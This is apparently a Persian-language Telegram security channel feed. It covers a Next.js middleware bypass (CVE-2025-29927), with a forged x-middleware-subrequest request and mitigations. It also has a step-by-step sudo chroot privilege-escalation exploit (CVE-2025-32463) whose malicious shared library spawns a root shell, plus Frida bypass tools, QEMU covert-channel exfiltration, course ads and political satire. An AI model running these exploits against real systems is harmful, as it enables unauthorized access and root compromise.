🔴 تحلیل آسیبپذیری بحرانی CVE-2025-29927 در Next.js
یک آسیبپذیری خطرناک در فریمورک Next.js شناسایی شده است که به مهاجمان امکان دور زدن کنترلهای امنیتی Middleware را از طریق دستکاری هدر x-middleware-subrequest میدهد.
این آسیبپذیری میتواند منجر به دسترسی غیرمجاز به بخشهای حساس برنامه شود.
-میزان خطر: بسیار بالا (Critical)
-دامنه تأثیرپذیری: بیش از ۹.۵ میلیون سرویس مبتنی بر Next.js
نسخههای آسیبپذیر: 11.x تا 15.x (نسخههای قبل از 15.2.3)
مکانیزم فنی Middleware در Next.js
وظیفه: پردازش درخواستها قبل از رسیدن به صفحه مقصد.
مشکل: اگر هدر x-middleware-subrequest وجود داشته باشد، سیستم آن را به عنوان یک درخواست داخلی شناسایی میکند و Middleware را اجرا نمیکند (NextResponse.next()).
نمونه کد آسیبپذیر در next-server.ts :
هکر میتواند مقدار middlewareInfo.name را حدس بزند (مثلاً pages/_middleware یا src/middleware).
نحوه اکسپلویت کردن :
یک نمونه برای نسخههای قدیمی (قبل از 12.2)
کافیست یک درخواست معمولی با هدر جعلی ارسال شود:
سیستم فکر میکند این یک درخواست "داخلی" است.
تمام مکانیزم های Middleware (مثل Auth) نادیده گرفته میشوند.
Reference:
https://github.com/azu/nextjs-cve-2025-29927-poc
@securation
یک آسیبپذیری خطرناک در فریمورک Next.js شناسایی شده است که به مهاجمان امکان دور زدن کنترلهای امنیتی Middleware را از طریق دستکاری هدر x-middleware-subrequest میدهد.
این آسیبپذیری میتواند منجر به دسترسی غیرمجاز به بخشهای حساس برنامه شود.
-میزان خطر: بسیار بالا (Critical)
-دامنه تأثیرپذیری: بیش از ۹.۵ میلیون سرویس مبتنی بر Next.js
نسخههای آسیبپذیر: 11.x تا 15.x (نسخههای قبل از 15.2.3)
مکانیزم فنی Middleware در Next.js
وظیفه: پردازش درخواستها قبل از رسیدن به صفحه مقصد.
مشکل: اگر هدر x-middleware-subrequest وجود داشته باشد، سیستم آن را به عنوان یک درخواست داخلی شناسایی میکند و Middleware را اجرا نمیکند (NextResponse.next()).
نمونه کد آسیبپذیر در next-server.ts :
if (subRequests.includes(middlewareInfo.name)) {
return NextResponse.next(); // bypass Middleware
}هکر میتواند مقدار middlewareInfo.name را حدس بزند (مثلاً pages/_middleware یا src/middleware).
نحوه اکسپلویت کردن :
یک نمونه برای نسخههای قدیمی (قبل از 12.2)
کافیست یک درخواست معمولی با هدر جعلی ارسال شود:
GET /admin HTTP/1.1
Host: example.com
x-middleware-subrequest: pages/_middleware
سیستم فکر میکند این یک درخواست "داخلی" است.
تمام مکانیزم های Middleware (مثل Auth) نادیده گرفته میشوند.
Reference:
https://github.com/azu/nextjs-cve-2025-29927-poc
@securation
GitHub
GitHub - azu/nextjs-cve-2025-29927-poc: Next.js PoC for CVE-2025-29927
Next.js PoC for CVE-2025-29927. Contribute to azu/nextjs-cve-2025-29927-poc development by creating an account on GitHub.
❤1
⭕️ یک آسیب پذیری اجرای کد از راه دور (RCE) در برنامه Telegram برای سیستم عامل MacOS کشف شده که یک محقق امنیتی با استفاده از هوش مصنوعی Manus تونسته کشف کنه.
این آسیب پذیری از طریق یک روش خاص، محدودیتهای فایل Telegram را دور میزند.
به این ترتیب، فایلهای دانلود شده بدون نیاز به تأیید کاربر قابل اجرا هستند.
این آسیب پذیری در آخرین نسخههای Telegram برای MacOS نیز تست شده و کار میکند.
Reference:
https://mp.weixin.qq.com/s/RiFgghK96QN-201SE5q8ag
#Telegram #0day
@securation
این آسیب پذیری از طریق یک روش خاص، محدودیتهای فایل Telegram را دور میزند.
به این ترتیب، فایلهای دانلود شده بدون نیاز به تأیید کاربر قابل اجرا هستند.
این آسیب پذیری در آخرین نسخههای Telegram برای MacOS نیز تست شده و کار میکند.
Reference:
https://mp.weixin.qq.com/s/RiFgghK96QN-201SE5q8ag
#Telegram #0day
@securation
⭕️ آیا بانک سپه هک شده ؟
چند روز قبل یک گروه هکری که چه عرض کنیم , یک کانال تلگرامی با 12 هزار عضو فیک و 100 عضو جدید که بهش اضافه شده بود ادعا کرد 12 ترابایت داده از بانک سپه هک کرده و در اختیار دارد.
درخواست باج چندین میلیون دلاری این کانال تلگرامی از بانک سپه ناکام ماند و آقای رضا همدانچی از اداره کل روابط عمومی بانک سپه با خبرگزاری فارس مصاحبه داشتن که ذکر کردند : سیستم های بانک سپه غیرقابل هک و نفوذ هستند.
این ادعای آقای همدانچی ما رو یاد زیرساخت ریاست جمهوری ضد هک , سازمان انرژی اتمی ضد هک , زیرساخت بنادر ضد هک, تلویزیون رسمی کشوری ضد هک ,پمپ بنزین های ضد هک , مجددا صدا و سیمای ضد هک , بانک های ضد هک در سال 1403 که چندین میلیارد تومان باج پرداخت شد , و انواع زیرساخت هایی مهم کشور که اخیرا هک شد و درخبرگزاری ها اما ضد هک اعلام میشدند, انداخت.
این حرفهای مسئولین زیر ساختی شبیه آقای روح الله رحمانی استاد ماشین لرنینگ در دانشگاه تهران بود که با وجود داشتن دکتری هوش مصنوعی از امریکا و کار کردن و ارتباط در زیرساخت ریاست جمهوری میگفت من گوشیم رو روت کردم و اندروید اپن سورس ریختم تا به گوگل وابسته نباشه چون مال آمریکاست.
همزمان از ایمیل مایکروسافتی استفاده میکرد بالخره یه مدتی کارمند شرکت مایکروسافت هم بود این بزرگوار :) بالخره گوگل امریکا با مایکروسافت امریکا فرق داره :)
ته سخنرانی های مذهبی که داشت سر کلاس هم اشاره میکرد که سرویس های ما فقط با آیپی ایران بالا میان و غیرقابل هک هستند , تهش همون غیرقابل هک همیشگی در خبرگزاری ها اعلام شد با دیتایی ارزشمند در دست گروه های هکری:)
حالا باید ببینیم این گروه تلگرامی که ادعای هک بانک سپه رو داشتند و گفتن با SQLI تونستن رول های فایروال رو بایپس کنند و نمونه ( sampel ) ✅ هم گذاشتن :دی که فعلا شماره کارت اقای روابط عمومی رو و مشخصات اشتباه از آب دراومده تا در آینده ببینیم چه خواهد شد.
فعلا که این کانال تلگرامی ما رو یاد نیما دنجر انداختن و انگار نوه های ایشونند که با zero-day و بروت فورس کوانتومی و شکستن رمزنگاری ها بانک سپه رو هک کردند.:)
همزمان با نوشتن این پست برای کانال نگاهی انداختم و دیدم که اطلاعیه دادند که 42 میلیون مشتری بانک سپه نام و نام خانوادگی و کد ملی و شماره تلفن و محل سکونت خودشون رو عوض کنند ✅🎞
فردا افتا میاد یک فایل شونصد مگابایتی رو اطلاعیه میده به همه سازمان ها که نصب کنید و codebreakers Detector هست شناسایی میکنه:)
همزمان که خودش رو اگر ران کنید احتمال زیادی آنتی ویروس سازمانی توی شبکه ببنده چون دراپ کردن کلی فایل همزمان خودش رفتار مشکوکه::دی
بعدا ابزار افتا رو مهندسی معکوس میکنید میبینید همون رول های YARA هستند که اگر دفعات قبل با CPP مینوشتن اینبار با استاد Python نوشتن .
بالخره کسپراسکای باید از ما الگوبرداری داشته باشه دیگه مگه نه ؟
هشتگ #مسئولین #ضد #هک
@securation
چند روز قبل یک گروه هکری که چه عرض کنیم , یک کانال تلگرامی با 12 هزار عضو فیک و 100 عضو جدید که بهش اضافه شده بود ادعا کرد 12 ترابایت داده از بانک سپه هک کرده و در اختیار دارد.
درخواست باج چندین میلیون دلاری این کانال تلگرامی از بانک سپه ناکام ماند و آقای رضا همدانچی از اداره کل روابط عمومی بانک سپه با خبرگزاری فارس مصاحبه داشتن که ذکر کردند : سیستم های بانک سپه غیرقابل هک و نفوذ هستند.
این ادعای آقای همدانچی ما رو یاد زیرساخت ریاست جمهوری ضد هک , سازمان انرژی اتمی ضد هک , زیرساخت بنادر ضد هک, تلویزیون رسمی کشوری ضد هک ,پمپ بنزین های ضد هک , مجددا صدا و سیمای ضد هک , بانک های ضد هک در سال 1403 که چندین میلیارد تومان باج پرداخت شد , و انواع زیرساخت هایی مهم کشور که اخیرا هک شد و درخبرگزاری ها اما ضد هک اعلام میشدند, انداخت.
این حرفهای مسئولین زیر ساختی شبیه آقای روح الله رحمانی استاد ماشین لرنینگ در دانشگاه تهران بود که با وجود داشتن دکتری هوش مصنوعی از امریکا و کار کردن و ارتباط در زیرساخت ریاست جمهوری میگفت من گوشیم رو روت کردم و اندروید اپن سورس ریختم تا به گوگل وابسته نباشه چون مال آمریکاست.
همزمان از ایمیل مایکروسافتی استفاده میکرد بالخره یه مدتی کارمند شرکت مایکروسافت هم بود این بزرگوار :) بالخره گوگل امریکا با مایکروسافت امریکا فرق داره :)
ته سخنرانی های مذهبی که داشت سر کلاس هم اشاره میکرد که سرویس های ما فقط با آیپی ایران بالا میان و غیرقابل هک هستند , تهش همون غیرقابل هک همیشگی در خبرگزاری ها اعلام شد با دیتایی ارزشمند در دست گروه های هکری:)
حالا باید ببینیم این گروه تلگرامی که ادعای هک بانک سپه رو داشتند و گفتن با SQLI تونستن رول های فایروال رو بایپس کنند و نمونه ( sampel ) ✅ هم گذاشتن :دی که فعلا شماره کارت اقای روابط عمومی رو و مشخصات اشتباه از آب دراومده تا در آینده ببینیم چه خواهد شد.
فعلا که این کانال تلگرامی ما رو یاد نیما دنجر انداختن و انگار نوه های ایشونند که با zero-day و بروت فورس کوانتومی و شکستن رمزنگاری ها بانک سپه رو هک کردند.:)
همزمان با نوشتن این پست برای کانال نگاهی انداختم و دیدم که اطلاعیه دادند که 42 میلیون مشتری بانک سپه نام و نام خانوادگی و کد ملی و شماره تلفن و محل سکونت خودشون رو عوض کنند ✅🎞
فردا افتا میاد یک فایل شونصد مگابایتی رو اطلاعیه میده به همه سازمان ها که نصب کنید و codebreakers Detector هست شناسایی میکنه:)
همزمان که خودش رو اگر ران کنید احتمال زیادی آنتی ویروس سازمانی توی شبکه ببنده چون دراپ کردن کلی فایل همزمان خودش رفتار مشکوکه::دی
بعدا ابزار افتا رو مهندسی معکوس میکنید میبینید همون رول های YARA هستند که اگر دفعات قبل با CPP مینوشتن اینبار با استاد Python نوشتن .
بالخره کسپراسکای باید از ما الگوبرداری داشته باشه دیگه مگه نه ؟
هشتگ #مسئولین #ضد #هک
@securation
⭕️تحلیل و بررسی آسیبپذیری امنیتی در Next.js (CVE-2025-29927)
در واقع Next.js یکی از محبوبترین فریمورکهای React برای توسعهی وب اپلیکیشنها است که امکانات زیادی برای بهینهسازی عملکرد ارائه میدهد.
با این حال، همانند هر فناوری دیگری، Next.js نیز ممکن است آسیبپذیریهایی داشته باشد که در صورت عدم بهروزرسانی، میتواند به هکرها اجازهی سوءاستفاده دهد.
حالا قراره آسیبپذیری CVE-2025-29927 را بررسی کنیم، نحوهی شناسایی آن را توضیح میدهیم و روشهایی برای پچ کردن آن ارائه میکنیم.
چگونه یک اپلیکیشن Next.js آسیبپذیر را شناسایی کنیم؟
روشهای رایج برای شناسایی Next.js
برای شناسایی اینکه آیا یک وب اپلیکیشن از Next.js استفاده میکند یا نه، میتوان از تکنیکهای زیر استفاده کرد:
1. برخی سرورها در هدرهای HTTP مقدار
2. فایلهای JS و CSS تولید شده توسط Next.js معمولاً در مسیر زیر قرار دارند.
3. در مرورگر، آبجکت
اپلیکیشنهای Next.js معمولاً یک آبجکت گلوبال (
شناسایی نسخهی آسیبپذیر
با ترکیب روشهای بالا، میتوان اپلیکیشنهایی را که از نسخههای آسیبپذیر Next.js استفاده میکنند، شناسایی کرد. با این حال، فقط شناسایی نسخهی آسیبپذیر کافی نیست!
بلکه باید بررسی کنیم که آیا مسیرهای حساس واقعاً تحت تأثیر این آسیبپذیری قرار دارند یا خیر.
تشخیص مسیرهای آسیبپذیر
مسیرهای آسیبپذیر معمولاً توسط مکانیزم احراز هویت محافظت میشوند و پیدا کردن آنها از طریق Crawling یا FUZZING ساده کارآمد نیست. به این دلیل که:
بسیاری از اپلیکیشنهای Next.js به صورت SPA (Single Page Application) اجرا میشوند و Crawling آن به ابزارهای پیشرفتهتری مثل مرورگرهای Headless نیاز دارد.
مسیرهای آسیبپذیر معمولاً بهصورت مخفی در کدهای جاوا اسکریپت تعریف میشوند و Crawler سنتی به آنها دسترسی ندارند.
روش جایگزین: استخراج مسیرهای API از فایلهای JS
به جای اتکا به Crawling، میتوان از تحلیل سورسکد جاوا اسکریپت یا استفاده از اکستنشن BurpJsLinkFinder برای استخراج مسیرهای مهم مثل API استفاده کرد. در این روش:
1- با تحلیل سورس کد JS یا استفاده از BurpJsLinkFinder میتوانیم مسیرهای مهم رو بیرون بکشیم و تو یه فایل ذخیره کنیم.
2- سپس مسیرهای استخراج شده، با یک Nuclei template مخصوص آزمایش میشوند تا ببینیم که آیا واقعاً آسیبپذیر هستند یا خیر.
یک نمونه Template خوب برای Nuclei از ProjectDiscovery
مثال از یک مسیر API در یک فایل جاوا اسکریپت:
نتیجهی تحلیل این کد، مسیر زیر را مشخص میکند:
با استفاده از این روش، میشه مسیرهای پنهان و آسیبپذیر را شناسایی کرد و بدون نیاز به Crawling، بهصورت دقیقتر این آسیبپذیری را تحلیل کرد.
چند اقدام و راهکار در مواجه با CVE-2025-29927 برای تیم Develop
بهترین راهکار: آپدیت کردن به نسخهی امن Next.js
بهترین و موثرترین روش برای جلوگیری از این آسیبپذیری، بهروزرسانی Next.js به نسخهی پچشده است.
اقدامات موقت (در صورت عدم امکان آپدیت فوری)
اگر امکان آپدیت فوری وجود ندارد، میتوان بهصورت موقت اقدامات زیر را انجام داد:
1. بلاک کردن هدر
2. مانیتورینگ لاگها و بررسی درخواستهای مشکوک که شامل این هدر میشوند.
@securation
در واقع Next.js یکی از محبوبترین فریمورکهای React برای توسعهی وب اپلیکیشنها است که امکانات زیادی برای بهینهسازی عملکرد ارائه میدهد.
با این حال، همانند هر فناوری دیگری، Next.js نیز ممکن است آسیبپذیریهایی داشته باشد که در صورت عدم بهروزرسانی، میتواند به هکرها اجازهی سوءاستفاده دهد.
حالا قراره آسیبپذیری CVE-2025-29927 را بررسی کنیم، نحوهی شناسایی آن را توضیح میدهیم و روشهایی برای پچ کردن آن ارائه میکنیم.
چگونه یک اپلیکیشن Next.js آسیبپذیر را شناسایی کنیم؟
روشهای رایج برای شناسایی Next.js
برای شناسایی اینکه آیا یک وب اپلیکیشن از Next.js استفاده میکند یا نه، میتوان از تکنیکهای زیر استفاده کرد:
1. برخی سرورها در هدرهای HTTP مقدار
X-Powered-By: Next.js را ارسال میکنند.2. فایلهای JS و CSS تولید شده توسط Next.js معمولاً در مسیر زیر قرار دارند.
/_next/static/
3. در مرورگر، آبجکت
next بهصورت گلوبال تعریف شده است که نسخهی Next.js را نمایش میدهد.اپلیکیشنهای Next.js معمولاً یک آبجکت گلوبال (
window.next) در سمت کلاینت دارند که شامل اطلاعات نسخهی Next.js است. این مورد را میتوان از طریق کنسول مرورگر بررسی کرد: console.log(window.next?.version);
شناسایی نسخهی آسیبپذیر
با ترکیب روشهای بالا، میتوان اپلیکیشنهایی را که از نسخههای آسیبپذیر Next.js استفاده میکنند، شناسایی کرد. با این حال، فقط شناسایی نسخهی آسیبپذیر کافی نیست!
بلکه باید بررسی کنیم که آیا مسیرهای حساس واقعاً تحت تأثیر این آسیبپذیری قرار دارند یا خیر.
تشخیص مسیرهای آسیبپذیر
مسیرهای آسیبپذیر معمولاً توسط مکانیزم احراز هویت محافظت میشوند و پیدا کردن آنها از طریق Crawling یا FUZZING ساده کارآمد نیست. به این دلیل که:
بسیاری از اپلیکیشنهای Next.js به صورت SPA (Single Page Application) اجرا میشوند و Crawling آن به ابزارهای پیشرفتهتری مثل مرورگرهای Headless نیاز دارد.
مسیرهای آسیبپذیر معمولاً بهصورت مخفی در کدهای جاوا اسکریپت تعریف میشوند و Crawler سنتی به آنها دسترسی ندارند.
روش جایگزین: استخراج مسیرهای API از فایلهای JS
به جای اتکا به Crawling، میتوان از تحلیل سورسکد جاوا اسکریپت یا استفاده از اکستنشن BurpJsLinkFinder برای استخراج مسیرهای مهم مثل API استفاده کرد. در این روش:
1- با تحلیل سورس کد JS یا استفاده از BurpJsLinkFinder میتوانیم مسیرهای مهم رو بیرون بکشیم و تو یه فایل ذخیره کنیم.
2- سپس مسیرهای استخراج شده، با یک Nuclei template مخصوص آزمایش میشوند تا ببینیم که آیا واقعاً آسیبپذیر هستند یا خیر.
یک نمونه Template خوب برای Nuclei از ProjectDiscovery
مثال از یک مسیر API در یک فایل جاوا اسکریپت:
const BASE_API = "/api/v1";
function getUser(id) {
http.get(BASE_API + "/user/" + id);
}
نتیجهی تحلیل این کد، مسیر زیر را مشخص میکند:
GET /api/v1/user/{id}با استفاده از این روش، میشه مسیرهای پنهان و آسیبپذیر را شناسایی کرد و بدون نیاز به Crawling، بهصورت دقیقتر این آسیبپذیری را تحلیل کرد.
چند اقدام و راهکار در مواجه با CVE-2025-29927 برای تیم Develop
بهترین راهکار: آپدیت کردن به نسخهی امن Next.js
بهترین و موثرترین روش برای جلوگیری از این آسیبپذیری، بهروزرسانی Next.js به نسخهی پچشده است.
اقدامات موقت (در صورت عدم امکان آپدیت فوری)
اگر امکان آپدیت فوری وجود ندارد، میتوان بهصورت موقت اقدامات زیر را انجام داد:
1. بلاک کردن هدر
x-middleware-subrequest در تنظیمات سرور، WAF یا پروکسی برای جلوگیری از اکسپلویت.2. مانیتورینگ لاگها و بررسی درخواستهای مشکوک که شامل این هدر میشوند.
@securation
GitHub
nuclei-templates/http/cves/2025/CVE-2025-29927.yaml at main · projectdiscovery/nuclei-templates
Community curated list of templates for the nuclei engine to find security vulnerabilities. - projectdiscovery/nuclei-templates
❤1
Forwarded from کانال بایت امن
Media is too big
VIEW IN TELEGRAM
#DEMO #OFEN
در این ویدیو، که دموی درس ۶۸ از فصل دوم "دورهی برنامهنویسی تهاجمی است"، در بخش اول به کدنویسی روشهای مختلف شناسایی نمونهی جدید (Instance) از یک برنامه پرداختیم. سپس در بخش دوم، با مهندسی معکوس نرمافزار OBS Studio بررسی کردیم که این برنامه از چه مکانیزمی برای شناسایی اجرای نمونههای (Instance) جدید استفاده میکند و در ادامه، همان روش را در پروژهی خودمان پیادهسازی کردیم.
🦅 کانال بایت امن | گروه بایت امن
_
در این ویدیو، که دموی درس ۶۸ از فصل دوم "دورهی برنامهنویسی تهاجمی است"، در بخش اول به کدنویسی روشهای مختلف شناسایی نمونهی جدید (Instance) از یک برنامه پرداختیم. سپس در بخش دوم، با مهندسی معکوس نرمافزار OBS Studio بررسی کردیم که این برنامه از چه مکانیزمی برای شناسایی اجرای نمونههای (Instance) جدید استفاده میکند و در ادامه، همان روش را در پروژهی خودمان پیادهسازی کردیم.
_
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from کانال بایت امن
Media is too big
VIEW IN TELEGRAM
ویدیو ی دموی جلسه 75 از "دوره برنامه نویسی تهاجمی مختص به تیم قرمز"
در این ویدیو، به صورت قدم به قدم وارد دنیای ساختار های داخلی ویندوز شدیم و بررسی کردیم که چگونه میتوان بدون وابستگی به API های معمول، به لیست ماژول های لود شده در یک پروسه دسترسی پیدا کرد. این تکنیک نه تنها در توسعه ابزارهای سطح پایین یا امنیتی بسیار کاربردی است، بلکه در موقعیتهایی که نیاز به پنهان کاری، تحلیل عمیق، یا بایپس کردن ابزار های امنیتی داریم، اهمیت ویژه ای پیدا میکند.
⬅️ بررسی گام به گام دسترسی به لیست ماژول ها از طریق ساختار PEB
⬅️ آشنایی دقیق با ساختارهای PEB_LDR_DATA، LDR_DATA_TABLE_ENTRY و LIST_ENTRY
⬅️ درک دقیق از مفهوم لیست پیوندی دو طرفه (Doubly-Linked List) و اهمیت آن در لیست کردن ماژول ها
⬅️ نکات مهم و حساس هنگام پیمایش لیست ماژولها از طریق PEB، بدون استفاده از API های کلاسیک مثل EnumProcessModules - GetModuleHandle - LoadLibrary و GetProcAddress
🦅 کانال بایت امن | گروه بایت امن
_
در این ویدیو، به صورت قدم به قدم وارد دنیای ساختار های داخلی ویندوز شدیم و بررسی کردیم که چگونه میتوان بدون وابستگی به API های معمول، به لیست ماژول های لود شده در یک پروسه دسترسی پیدا کرد. این تکنیک نه تنها در توسعه ابزارهای سطح پایین یا امنیتی بسیار کاربردی است، بلکه در موقعیتهایی که نیاز به پنهان کاری، تحلیل عمیق، یا بایپس کردن ابزار های امنیتی داریم، اهمیت ویژه ای پیدا میکند.
_
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from کانال بایت امن
#Article #Tools
چند مقاله و ابزار درباره ساختار PE قبلاً در وبلاگ قرار داده بودم که امروز اونها رو بهروزرسانی کردم. سورسکدها و ویدیوهای دمو هم اضافه شده تا این مفاهیم بهتر قابل درک باشن و راحتتر بتونید با موضوع ساختار PE ارتباط برقرار کنید.
⬅️ بررسی و تحلیل Checksum در ساختار PE
⬅️ بررسی و تشریح DEP و ASLR در ساختار PE
⬅️ ابزار تبدیل DLL به EXE
⬅️ ابزار حذف DEP و ASLR از ساختار PE
⬅️ ابزار تصحیح Checksum در ساختار PE
🦅 کانال بایت امن | گروه بایت امن
_
چند مقاله و ابزار درباره ساختار PE قبلاً در وبلاگ قرار داده بودم که امروز اونها رو بهروزرسانی کردم. سورسکدها و ویدیوهای دمو هم اضافه شده تا این مفاهیم بهتر قابل درک باشن و راحتتر بتونید با موضوع ساختار PE ارتباط برقرار کنید.
_
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from کانال بایت امن
#DWORD
دوره چالش های مهندسی معکوس سطح 1 در لیست دوره های آکادمی قرار گرفت
این دوره رایگان، فرصتی است برای ورود عملی به دنیای مهندسی معکوس و حل چالشهای واقعی در حوزه تحلیل باینری. در طول دوره، به سراغ مجموعهای از چالشهای منتخب از مسابقات بینالمللی CTF میرویم.
این چالشها از رقابتهایی مانند Flare-On یکی از معتبرترین و شناختهشدهترین مسابقات مهندسی معکوس برگرفته شدهاند.
🦅 کانال بایت امن | گروه بایت امن
_
دوره چالش های مهندسی معکوس سطح 1 در لیست دوره های آکادمی قرار گرفت
این دوره رایگان، فرصتی است برای ورود عملی به دنیای مهندسی معکوس و حل چالشهای واقعی در حوزه تحلیل باینری. در طول دوره، به سراغ مجموعهای از چالشهای منتخب از مسابقات بینالمللی CTF میرویم.
این چالشها از رقابتهایی مانند Flare-On یکی از معتبرترین و شناختهشدهترین مسابقات مهندسی معکوس برگرفته شدهاند.
_
Please open Telegram to view this post
VIEW IN TELEGRAM
⭕️ FridaScriptGen
این برنامه کد Smali یک APK را برای شناسایی ریشه و الگوهای SSL-pinning اسکن میکند و سپس به طور خودکار اسکریپتهای Frida را برای دور زدن این بررسیهای امنیتی ایجاد میکند.
📎 GitHub
@Securation
#Android #Frida
این برنامه کد Smali یک APK را برای شناسایی ریشه و الگوهای SSL-pinning اسکن میکند و سپس به طور خودکار اسکریپتهای Frida را برای دور زدن این بررسیهای امنیتی ایجاد میکند.
📎 GitHub
@Securation
#Android #Frida
❤1
⭕️ Frida Launcher 🚀
سرور Frida را به راحتی و تنها با یک لمس، روی دستگاههای اندروید و شبیهسازها مدیریت کنید!
📎 GitHub
@Securation
#Android #Frida
سرور Frida را به راحتی و تنها با یک لمس، روی دستگاههای اندروید و شبیهسازها مدیریت کنید!
📎 GitHub
@Securation
#Android #Frida
⭕️ اخیرا آسیب پذیریجدیدی از نوع LPE اخیرا با شناسه CVE-2025-32463 منتشر شده. این آسیبپذیری در صورتی فعال میشود که از پارامتر --Chroot استفاده شده و مسیر nsswitch.conf به صورت دستی کنترل شود.
به طوری که اگر در پیکربندی route از pass: unix:/path/to/socket استفاده شده باشد و پارامتر Share تنظیم نشده باشد، Sudo قبل از بارگذاری sudoers، فایل nsswitch.conf را از محیط chroot می خواند.
این یعنی مهاجم توانایی قرار دادن فایل تقلبی و یک shared object مخرب، اجرای کد به عنوان root انجام دهد بدون نیاز به اینکه در فایل sudoers ثبت شده باشد.
مراحل مربوط به رسیدن به سطح دسترسی مورد نیاز:
ساخت دایرکتوری chroot و فایلهای موردنیاز
نوشتن shared library مخرب
کامپایل shared library
اجرای اکسپلویت
#RedTeam #LPE #EXP
@securation
به طوری که اگر در پیکربندی route از pass: unix:/path/to/socket استفاده شده باشد و پارامتر Share تنظیم نشده باشد، Sudo قبل از بارگذاری sudoers، فایل nsswitch.conf را از محیط chroot می خواند.
این یعنی مهاجم توانایی قرار دادن فایل تقلبی و یک shared object مخرب، اجرای کد به عنوان root انجام دهد بدون نیاز به اینکه در فایل sudoers ثبت شده باشد.
مراحل مربوط به رسیدن به سطح دسترسی مورد نیاز:
ساخت دایرکتوری chroot و فایلهای موردنیاز
mkdir -p /tmp/pwnroot/etc
mkdir -p /tmp/pwnroot/lib
نوشتن shared library مخرب
#define _GNU_SOURCE
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
#include <stdio.h>
__attribute__((constructor)) void pwn() {
setresuid(0, 0, 0);
setresgid(0, 0, 0);
system("/bin/bash");
}
کامپایل shared library
gcc -fPIC -shared -o libnss_myexploit.so.2 myexploit.c
اجرای اکسپلویت
sudo -R /tmp/pwnroot id
#RedTeam #LPE #EXP
@securation
⭕️ مرکز فابا کجاست؟
مرکز فناوری نوین آفتابه سازان دستشویی های بین راهی.
مداد پرس ؟
مرکز دیجیتال احمق های امنیت داده.
با DDOS زدن تونستن دسترسی بگیرند و نفوذ کنند؟
بعد همزمان با حمله سایبری از نوع DDOS دستور تخلیه ساختمان ها رو دادند؟
احتمالا پکت هایی که ارسال میشه هرکدوم حاوی موشک و پهپاد بوده مگه نه؟ مثلا در یک پکت ارسال شده اومدن ترافیک رو تحلیل کردن حاوی نیم کیلو TNT بوده دستور تخلیه شعبات داده شده.
#دستشوییهای_سایبری
@securation
مرکز فناوری نوین آفتابه سازان دستشویی های بین راهی.
مداد پرس ؟
مرکز دیجیتال احمق های امنیت داده.
با DDOS زدن تونستن دسترسی بگیرند و نفوذ کنند؟
بعد همزمان با حمله سایبری از نوع DDOS دستور تخلیه ساختمان ها رو دادند؟
احتمالا پکت هایی که ارسال میشه هرکدوم حاوی موشک و پهپاد بوده مگه نه؟ مثلا در یک پکت ارسال شده اومدن ترافیک رو تحلیل کردن حاوی نیم کیلو TNT بوده دستور تخلیه شعبات داده شده.
#دستشوییهای_سایبری
@securation
😁2
Forwarded from کانال بایت امن
#DWORD
بازنویسی کد با رویکرد مهندسی معکوس
دوره رایگان و تخصصی آکادمی DWORD
در این دوره تخصصی، با تمرکز بر مهندسی معکوس توابع کلیدی نرمافزارها و کتابخانهها، به شما آموزش میدهیم چگونه منطق توابع را تحلیل، ایزوله و بازنویسی کنید.
این فرآیند مشابه روش fuzzing است که در آن، با ساختن یک harness، تابع هدف را با ورودیهای مختلف آزمایش میکنیم تا رفتار و مسیرهای منطقی آن را کشف کنیم.
با گذراندن این دوره، مهارتهای لازم برای:
⬅️ درک دقیق ورودیها و خروجیهای توابع
⬅️ تحلیل رفتار و مسیرهای منطقی
⬅️ بازنویسی توابع به صورت خوانا و مستند
را کسب خواهید کرد تا بتوانید مثل یک تحلیلگر امنیتی حرفهای یا توسعهدهنده ابزارهای امنیتی عمل کنید.
🦅 کانال بایت امن | گروه بایت امن
_
بازنویسی کد با رویکرد مهندسی معکوس
دوره رایگان و تخصصی آکادمی DWORD
در این دوره تخصصی، با تمرکز بر مهندسی معکوس توابع کلیدی نرمافزارها و کتابخانهها، به شما آموزش میدهیم چگونه منطق توابع را تحلیل، ایزوله و بازنویسی کنید.
این فرآیند مشابه روش fuzzing است که در آن، با ساختن یک harness، تابع هدف را با ورودیهای مختلف آزمایش میکنیم تا رفتار و مسیرهای منطقی آن را کشف کنیم.
با گذراندن این دوره، مهارتهای لازم برای:
را کسب خواهید کرد تا بتوانید مثل یک تحلیلگر امنیتی حرفهای یا توسعهدهنده ابزارهای امنیتی عمل کنید.
_
Please open Telegram to view this post
VIEW IN TELEGRAM
⭕️ امنیت CI/CD رو امشب در خدمتتون هستیم:
🕘 ساعت ۹
💡روشهای نفوذ از طریق CI/CD
💡دسترسی به سرورهای تست و پروداکشن
💡دسترسی به SECRETها
💡اصول امن سازی و توسعه امن نرم افزار
meet.google.com/rdr-cutu-qwd
#CICD #Security
@securation
🕘 ساعت ۹
💡روشهای نفوذ از طریق CI/CD
💡دسترسی به سرورهای تست و پروداکشن
💡دسترسی به SECRETها
💡اصول امن سازی و توسعه امن نرم افزار
meet.google.com/rdr-cutu-qwd
#CICD #Security
@securation
⭕️ اخیرا مقاله ای از TrustedSec نوشته شده که روشی هوشمندانه به جهت ایجاد Covert Channel بین Guest و Host از طریق QEMU Virtualization بدون نیاز به NIC یا ارتباط TCP/IP ارایه شده است.
مهاجم با سوءاستفاده از VirtIO queues، Shared memory یا I/O emulation hooks دادههایی رو منتقل میکند که در سطح Network stack قابل تشخیص نیستند. این تکنیک میتواند از QEMU های Patch شده یا حتی از قابلیتهای Native مثل Virtio-serial برای ارسال داده بین Host و Guest استفاده کند.
به طوری که QEMU بهعنوان یک Hypervisor اجازهی انتقال داده بین Host و Guest رو از طریق Shared memory, Virtio devices یا Custom I/O Handlers میدهد. این مسیرها میتوانند بدون اینکه بستهای در شبکه واقعی رد و بدل بشود، اطلاعات حمل کنند.
و از Chardev, -Device virtserialport برای ساخت یک Pipe-like interface بین Host و Guest استفاده میشود. که امکان ایجاد Shell خود از طریق این interface روی Guest قرار دهد و روی Host listener بنویسد که دادهها رو پردازش کند.
و البته QEMU دارای دستورات داخلی مانند QEMU-ga، Guest-set-time, Guest-exec هست که برای مدیریت VM طراحی شدن، ولی میتواند بهعنوان ابزار انتقال داده پنهان استفاده شود.
#RedTeam #C2 #Exfiltration
@securation
